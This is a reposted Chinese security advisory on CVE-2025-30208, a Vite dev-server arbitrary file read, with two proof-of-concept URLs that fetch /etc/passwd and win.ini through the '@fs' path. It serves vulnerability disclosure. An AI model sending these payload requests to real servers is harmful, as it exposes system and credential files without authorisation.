Vite存在任意文件读取漏洞 CVE-2025-30208 POC

admin 2025年3月28日10:52:49评论18 views字数 455阅读1分31秒阅读模式
产品描述

Vite是一种新型前端构建工具,能够显著提升前端开发体验。它主要由两部分组成:一个开发服务器,它基于 原生 ES 模块 提供了 丰富的内建功能,如速度快到惊人的 模块热更新(HMR)。一套构建指令,它使用 Rollup 打包你的代码,并且它是预配置的,可输出用于生产环境的高度优化过的静态资源。Vite 意在提供开箱即用的配置,同时它的 插件 API 和 JavaScript API 带来了高度的可扩展性,并有完整的类型支持。

漏洞描述
该漏洞源于 Vite 开发服务器在处理特定 URL 请求时,没有对请求的路径进行严格的安全检查和限制,导致攻击者可以绕过保护机制,非法访问项目根目录外的敏感文件。
Poc
https://xx.xx.xx.xx/@fs/etc/passwd?import&raw??
https://xx.xx.xx.xx/@fs/C://windows/win.ini?import&raw??
漏洞复现
Vite存在任意文件读取漏洞  CVE-2025-30208 POC

原文始发于微信公众号(什么安全):【漏洞复现】Vite存在任意文件读取漏洞 CVE-2025-30208

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月28日10:52:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vite存在任意文件读取漏洞 CVE-2025-30208 POChttps://cn-sec.com/archives/3893202.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息